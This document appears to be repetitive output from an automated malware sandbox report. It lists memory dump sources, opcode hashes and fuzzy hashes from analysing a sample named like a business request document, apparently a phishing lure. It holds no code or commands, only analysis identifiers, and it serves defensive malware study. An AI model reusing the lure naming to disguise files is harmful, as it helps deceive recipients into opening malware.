                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 15e7eaa5df35d80039b2834e9fffe56666118728adfc7b695f687d32b1fd22a4
                                                                                                                                                    • Instruction ID: 321633b25f188601277aea9501799e3f26cd2b3ce9c498d352275c6e57366ff8
                                                                                                                                                    • Opcode Fuzzy Hash: 15e7eaa5df35d80039b2834e9fffe56666118728adfc7b695f687d32b1fd22a4
                                                                                                                                                    • Instruction Fuzzy Hash: 75E0EC30915208EFCB50DFA8E95979CBBB8AB48605F1441A9C84893350E630AA50CB45
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: aa1b0504e33501e1292671c2950b6f7eb9caf1a87a2643cdd4fad25a58951250
                                                                                                                                                    • Instruction ID: be5909703463068d0216e87cded2d1e7ed352123f61e23f3f4e3c6c618bee8d3
                                                                                                                                                    • Opcode Fuzzy Hash: aa1b0504e33501e1292671c2950b6f7eb9caf1a87a2643cdd4fad25a58951250
                                                                                                                                                    • Instruction Fuzzy Hash: F4E02B31802208DBDB00FFF9D82174E7FA8EB04308F0004EED50593270DE314E0097A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d11103d772968bb3795b2004fa1ef5713e99ab77c2d2985c2296057141e70fae
                                                                                                                                                    • Instruction ID: 0b5d54375851aa6a72bea96f771b186151d99a770224846cc529339adb8f55d8
                                                                                                                                                    • Opcode Fuzzy Hash: d11103d772968bb3795b2004fa1ef5713e99ab77c2d2985c2296057141e70fae
                                                                                                                                                    • Instruction Fuzzy Hash: CCE01274A09208EBC704DFA8FA5556CBF79FB89305F1491DDCC0957781DA319E42CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 88d4c0abfd5b095e06d6fb941ff55282839cc522340c551e54e3bb5531077e2b
                                                                                                                                                    • Instruction ID: ff8ab2669d690f970653d410b0515a037cecf936db5175abd8788ae310d45665
                                                                                                                                                    • Opcode Fuzzy Hash: 88d4c0abfd5b095e06d6fb941ff55282839cc522340c551e54e3bb5531077e2b
                                                                                                                                                    • Instruction Fuzzy Hash: 09D01230949244DFDB44CF98E551ABCB7A8EB9B315F24529DC81957391D6734D02CB01
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fec47c676dbcd89a1af7824f7bb8782cad43fafe4a2410f27d9ce63760878726
                                                                                                                                                    • Instruction ID: 4931c8349ce82151182a8ee5408927e26f7a98ca3ba83bf50a2f6f989dc1787f
                                                                                                                                                    • Opcode Fuzzy Hash: fec47c676dbcd89a1af7824f7bb8782cad43fafe4a2410f27d9ce63760878726
                                                                                                                                                    • Instruction Fuzzy Hash: D5D05B30D45208DBC704DFA4E9555AD7B79EB46305F1451E9C44417340D7315D51DF55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a4f0bb1fd415b493481005d4b434598e78537f31a80c77d3e8e937f857c4937b
                                                                                                                                                    • Instruction ID: 538dbd8d0bf78a406198766d6f7678922a38f9ee35f90340c07431d017e1948e
                                                                                                                                                    • Opcode Fuzzy Hash: a4f0bb1fd415b493481005d4b434598e78537f31a80c77d3e8e937f857c4937b
                                                                                                                                                    • Instruction Fuzzy Hash: 7CF0F4B4A5562ACFCB64DF24DD547AABBB1BB48206F4041F9941DA3250DB341E81DF04
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 20c2fcb711ec73e64255f3ce0cb39352c89336dcb134bda50094707d422d86ac
                                                                                                                                                    • Instruction ID: d45948749a14947a35a0eacfda1d7572723d32ef7b7eab7478faac8ba050d0d9
                                                                                                                                                    • Opcode Fuzzy Hash: 20c2fcb711ec73e64255f3ce0cb39352c89336dcb134bda50094707d422d86ac
                                                                                                                                                    • Instruction Fuzzy Hash: FCD0123090560CDBC714DFA4E94956D7F78E745305F245195C54423394D6312D65DA85
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 00432c8b82b396ad9047b785755f55299aedc6a9c14a0d9cc458bacb90a64a8e
                                                                                                                                                    • Instruction ID: 3a0a199efb0b98bed136657d33b84ab97ada40e603917a8a282f128f20d76f8b
                                                                                                                                                    • Opcode Fuzzy Hash: 00432c8b82b396ad9047b785755f55299aedc6a9c14a0d9cc458bacb90a64a8e
                                                                                                                                                    • Instruction Fuzzy Hash: D1E01271A0130CEFD704EFB5E94176D77F5EB85600F504999E508DB244EA759F01AB84
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e9b7304e2667c449a67c42153793bab3a0451ab75078c441a5ec6daeda8a3bd4
                                                                                                                                                    • Instruction ID: 3209e06477d8734e71471d31ae29cabfca2993856375c0e8968def687e13e700
                                                                                                                                                    • Opcode Fuzzy Hash: e9b7304e2667c449a67c42153793bab3a0451ab75078c441a5ec6daeda8a3bd4
                                                                                                                                                    • Instruction Fuzzy Hash: 7CD05E34909108DBC748CB98E951B6CBBBCEB4E204F1460DDCD0957381DA329D02C740
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6aeef278a135b0fad6455ba08621427c25f6262336c0490c7ca154cbd0b2c736
                                                                                                                                                    • Instruction ID: 88a6382796ce5ceec75d16b8c6cd54267d879a46e4cf20dc5578b873c5a07495
                                                                                                                                                    • Opcode Fuzzy Hash: 6aeef278a135b0fad6455ba08621427c25f6262336c0490c7ca154cbd0b2c736
                                                                                                                                                    • Instruction Fuzzy Hash: 57F01E34A042188FCB20CFA8D944BDDBBB0FB18300F1081AAD449AB248E7710A409F00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ea8e9a00c573fd6943c2bdc3b53b45c5aea7fd4f6b8cc201d8215cfb3d8d1618
                                                                                                                                                    • Instruction ID: b8bc44d1d4664f387b4c4c9cccea193ff01dc7f84c8f5393a4ed90e0a96c3de2
                                                                                                                                                    • Opcode Fuzzy Hash: ea8e9a00c573fd6943c2bdc3b53b45c5aea7fd4f6b8cc201d8215cfb3d8d1618
                                                                                                                                                    • Instruction Fuzzy Hash: 00E0B670E04A08DFDB19CF59E484A9CBBF2FF59701F488565E14AD7251E734A851CE01
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d0a28207eab6480a4011c230f834055bb0d58d7c4e4c80d2c2dab8900661b526
                                                                                                                                                    • Instruction ID: 23ef733a2b29a8b016eeb7fc55e9a99483e34c103b56fb07201867b2992668f3
                                                                                                                                                    • Opcode Fuzzy Hash: d0a28207eab6480a4011c230f834055bb0d58d7c4e4c80d2c2dab8900661b526
                                                                                                                                                    • Instruction Fuzzy Hash: A6E01271A0124CEFC714DFA5E50165DB7F5EB44300F508599D808D7305EA319F019791
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f9a9614235247676408ca5cfff782ddbe349ab072c0adebf7a4b1949af84065c
                                                                                                                                                    • Instruction ID: f0eddb111fa126d184e705c2e126b9bf51916fef0e5335a4508779bfdb18a5ee
                                                                                                                                                    • Opcode Fuzzy Hash: f9a9614235247676408ca5cfff782ddbe349ab072c0adebf7a4b1949af84065c
                                                                                                                                                    • Instruction Fuzzy Hash: DEE0863490529CCBD7518F64DC087EEBE71FB48344F40909ED95967290DB780A84DF04
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 93a393a13aa11a35eba4a4e5ea644ff4ae4905fc1411ad3b6148734e86343a88
                                                                                                                                                    • Instruction ID: b9331762deed9199f6e82d7b755cb901365872876bbe0cd4f1ec621408fde8a1
                                                                                                                                                    • Opcode Fuzzy Hash: 93a393a13aa11a35eba4a4e5ea644ff4ae4905fc1411ad3b6148734e86343a88
                                                                                                                                                    • Instruction Fuzzy Hash: C6E08630A0521CCBEB619FA4D8543DD7EB1FB45344F1090ADC64966290CB790AC5DF14
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2d3cf17de5f95a6c59719160c72358e6f44447d0636ec87a0ba6c970bc5d5002
                                                                                                                                                    • Instruction ID: b9c774e392bcbc2da6de0d30bac9a0293247ba25a2ad876586b8cc791dc32c03
                                                                                                                                                    • Opcode Fuzzy Hash: 2d3cf17de5f95a6c59719160c72358e6f44447d0636ec87a0ba6c970bc5d5002
                                                                                                                                                    • Instruction Fuzzy Hash: B1E0C974A44259CFDB519F60DC9C7A8BB75FB45345F0042EA940A6B2A2CB701E85CF45
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d584c3236d2e85c73908d0280452d45622a6f2f66c2fa26b630e0378778611ba
                                                                                                                                                    • Instruction ID: 4be098eed6b586dcf73b058dc162252704e5f2d630f502084a2e20b6b6da83a1
                                                                                                                                                    • Opcode Fuzzy Hash: d584c3236d2e85c73908d0280452d45622a6f2f66c2fa26b630e0378778611ba
                                                                                                                                                    • Instruction Fuzzy Hash: E7D05E35700B469B8B26963EA61015E76E15FC56203004A28D496C6688EE20DC424B46
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e4ead3bb7441e8f97e5c727c4ff41c88620d7afb0318ca2751d54626adc4ca1c
                                                                                                                                                    • Instruction ID: f9ea509ea0ae12f174b0793ab3e0b273bd4991873926c7eff6680d3d2fb97134
                                                                                                                                                    • Opcode Fuzzy Hash: e4ead3bb7441e8f97e5c727c4ff41c88620d7afb0318ca2751d54626adc4ca1c
                                                                                                                                                    • Instruction Fuzzy Hash: 28E04F74A01128CFD725EF64D9557ADB7B6EB49300F4081A9DA0EA7392CB345F46CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: dc7ea2692f28450f8b872458da5edf3cbc8853bf3e22811b4be3de5e640d5a69
                                                                                                                                                    • Instruction ID: c97cd818266cbe521f479de7dd6da75c03a9d6f8c078f54215563bf90c8fc721
                                                                                                                                                    • Opcode Fuzzy Hash: dc7ea2692f28450f8b872458da5edf3cbc8853bf3e22811b4be3de5e640d5a69
                                                                                                                                                    • Instruction Fuzzy Hash: 2FE01274A00368CFCB25EFA4D85879DB7B1FBC8305F0002AAA40AAB390CB741E84CF11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1108a9dfcc7d7e8b460d283a5267734ab91aec0d6d3dfa3dd4827ce7d0e60138
                                                                                                                                                    • Instruction ID: 9cf981dad27b8463ba336407dd66f6e2e358c1619d123f23f04a356e2ecd53d2
                                                                                                                                                    • Opcode Fuzzy Hash: 1108a9dfcc7d7e8b460d283a5267734ab91aec0d6d3dfa3dd4827ce7d0e60138
                                                                                                                                                    • Instruction Fuzzy Hash: EDE04F34A0062ACBC72DEF54DD55BAEB7B1FB88701F0002A9D90AA7794EB301E809F01
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 39b3895c9dc24ead996baa613a5c19efd931cf875a9390117bbabf7f9fe87a39
                                                                                                                                                    • Instruction ID: b4e0f41d7c419e7afd6550526aa69412e4ad7bc31bba50635c1054ed9b78a783
                                                                                                                                                    • Opcode Fuzzy Hash: 39b3895c9dc24ead996baa613a5c19efd931cf875a9390117bbabf7f9fe87a39
                                                                                                                                                    • Instruction Fuzzy Hash: E2E04F34A002A8CFC769EFA4DC5479D7772FB88301F0042A9941DAB391DB301E808F10
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8b56784565ddbd6617bdb2098910e76ab974479864ee372acbea1720a35fa2bd
                                                                                                                                                    • Instruction ID: 9110a776c1cb5db1ff4438b67038d845aaddd898853ab3d72e2b429265e446ef
                                                                                                                                                    • Opcode Fuzzy Hash: 8b56784565ddbd6617bdb2098910e76ab974479864ee372acbea1720a35fa2bd
                                                                                                                                                    • Instruction Fuzzy Hash: ADD05B71A0130CEFCB44DFB8D90155D77F5DB4830575045A9D418D7314DB319F049B80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c04da45ea41f8c9a7f16a570238a56b6763d25c204ce9b5fac9e9d6a04ead279
                                                                                                                                                    • Instruction ID: a975663717ea783645e43487677509371ed52dd8aa2942072295458bd25706bc
                                                                                                                                                    • Opcode Fuzzy Hash: c04da45ea41f8c9a7f16a570238a56b6763d25c204ce9b5fac9e9d6a04ead279
                                                                                                                                                    • Instruction Fuzzy Hash: 55D0A771900342ABCF4193B4651415D3FB57F95274794435E9E5D831E5E911C841C610
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: cbb5149c18a592f52541f0cf81450103737f1a336230e762019425ebcb7fbc13
                                                                                                                                                    • Instruction ID: 1d836e838260e3a563a4aa6661c0e70e2e7baf1ac379cef3b6260a0ff4a3211e
                                                                                                                                                    • Opcode Fuzzy Hash: cbb5149c18a592f52541f0cf81450103737f1a336230e762019425ebcb7fbc13
                                                                                                                                                    • Instruction Fuzzy Hash: FEC08C3130430AABEF0197F8B90412A3BEDAB882587D88468FE0DC3A41FE22EC41C190
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 398b1286490eaa5698e65a581455d31039cae54111f49becfe4709b6900f507e
                                                                                                                                                    • Instruction ID: f01112cbc3881fa21c50c08cb325dacca761144a432d6fc21e332195b539984f
                                                                                                                                                    • Opcode Fuzzy Hash: 398b1286490eaa5698e65a581455d31039cae54111f49becfe4709b6900f507e
                                                                                                                                                    • Instruction Fuzzy Hash: 23E012B0A02228CFDB61CF60DC48B99BBB0BB04300F0014EAC009A22A0EB302F85EF04
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c8b07ce26cb710bf74f46a525b7fce13216c5a93a35d179da75d010c7221d47e
                                                                                                                                                    • Instruction ID: 449067856109ce532ef3804ffe9d6dd295b97ecf349ffc6c5831ba03b935358e
                                                                                                                                                    • Opcode Fuzzy Hash: c8b07ce26cb710bf74f46a525b7fce13216c5a93a35d179da75d010c7221d47e
                                                                                                                                                    • Instruction Fuzzy Hash: 3BD0A730A40204AFCB449774E81415D37F19FC92343100218D85EC76F2DF7588828A00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3119635d5359f0e6d448e1b815832cdf50ab5897c5d2327d40fabf6c17ff697a
                                                                                                                                                    • Instruction ID: e72b83a475fc4fe41651d6545343137ffbb2a924dc1b43af038eb57b4156d034
                                                                                                                                                    • Opcode Fuzzy Hash: 3119635d5359f0e6d448e1b815832cdf50ab5897c5d2327d40fabf6c17ff697a
                                                                                                                                                    • Instruction Fuzzy Hash: E6D022B0B00202BBCF06AF20E1040AA3FB8BF442E83A0802DA908C7641FB33CC018980
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8ac642c4f8f4d8e254bbeba3d1a75e29a39a657c80b1618d6fbef52f898c2ee6
                                                                                                                                                    • Instruction ID: 7a6d206381a6e4615d68bfeb656bf754434b31762d17fdd36928bf5de49655c0
                                                                                                                                                    • Opcode Fuzzy Hash: 8ac642c4f8f4d8e254bbeba3d1a75e29a39a657c80b1618d6fbef52f898c2ee6
                                                                                                                                                    • Instruction Fuzzy Hash: DDC08C2008A6088AC2201788FE5C33A3A8CA30B30AF802684884D808A24B308C40C140
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
